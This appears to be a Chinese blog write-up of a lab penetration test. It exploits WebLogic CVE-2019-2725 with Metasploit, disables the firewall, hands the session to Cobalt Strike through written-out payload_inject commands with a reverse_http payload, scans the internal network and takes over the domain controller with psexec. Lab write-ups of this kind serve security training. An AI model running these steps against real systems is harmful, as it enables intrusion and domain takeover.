紅日靶場二

小小狂徒發表於2024-07-12

一、所需環境

web端(雙網路卡)pc主機(雙網路卡)dc
web端開啟weblogic服務,360安全衛士
二、資訊收集
1、目標主機探測

2、埠掃描

發現開啟了許多高危埠,比如:7001、3389、445等
3、對7001weblogic埠就行漏洞掃描--->工具(Vscan-plus)

發現掃出了一些cve漏洞,然後逐個嘗試
三、打點
1、訪問weblogic頁面

沒啥東西接著就是對該服務的漏洞利用了
2、使用msf就行漏洞利用
經過多次嘗試覺得使用cve-2019-2725漏洞可以成功使用,而且不會被殺軟攔截



發現已經成功獲得了對方的shell,檢視了一下許可權,發現是administrator還行,使用getsystem提權失敗,則想著將對方的防火牆關閉掉,一邊後續的滲透操作

接著就是檢視一下目標機器的IP資訊

發現還有一個內網地址,然後接著使用systeminfo看一下目標主機打了那些補丁

然後還發現了域 de1ay.com
四、內網滲透
1、msf委派cs上線
use exploit/windows/local/payload_inject
set session 1
set lport 5757
set DisablePayloadHandler true
set payload windows/meterpreter/reverse_http

cs配置監聽模組

成功委派上線
2、爬取域管的賬戶密碼

確定域管理員
shell net user /domain

發現此處不能直接檢視,要在域控內才行,接著就是對其餘的主機就行橫向滲透
3、內網埠掃描
portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024


發現了兩個主機一個是pc,另一個是dc,然後就是透過使用psexec,使用域管理員賬戶登陸dc




發現dc已成功拿下,pc同理

橫向滲透完成